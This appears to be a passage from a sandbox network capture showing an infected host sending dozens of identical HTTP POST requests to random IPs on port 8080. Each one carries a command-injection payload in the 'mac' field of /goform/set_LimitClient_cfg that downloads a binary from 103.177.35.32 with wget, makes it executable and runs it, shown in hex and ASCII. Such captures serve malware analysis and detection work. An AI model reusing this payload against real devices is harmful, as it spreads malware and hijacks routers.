                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        744192.168.2.2355052183.111.124.1898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400235891 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        745192.168.2.233554862.186.193.1938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400283098 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        746192.168.2.235676066.43.132.1048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400305986 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        747192.168.2.2333770142.158.42.1258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400343895 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        748192.168.2.2348668210.83.229.1648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400360107 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        749192.168.2.234248652.101.92.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400399923 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        750192.168.2.234069634.176.30.1048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400404930 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        751192.168.2.2338906134.36.121.808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400408030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        752192.168.2.2358976144.157.118.1998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400437117 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        753192.168.2.2342524219.11.170.1718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400459051 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        754192.168.2.2353368136.42.200.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400460005 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        755192.168.2.235394665.243.178.2508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400476933 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        756192.168.2.2335038178.65.113.728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400489092 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        757192.168.2.235108041.236.114.968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400509119 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        758192.168.2.2352166134.243.81.2518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400532007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        759192.168.2.2340064168.98.254.1198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400732040 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        760192.168.2.234963435.141.88.1568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400775909 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        761192.168.2.234805679.79.200.2328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400795937 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        762192.168.2.2349774174.36.15.1918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.400825977 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        763192.168.2.234011863.170.70.1068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401002884 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        764192.168.2.2344290186.162.132.2248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401010036 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        765192.168.2.2358174176.211.183.1568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401041985 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        766192.168.2.235181248.16.148.1408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401067972 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
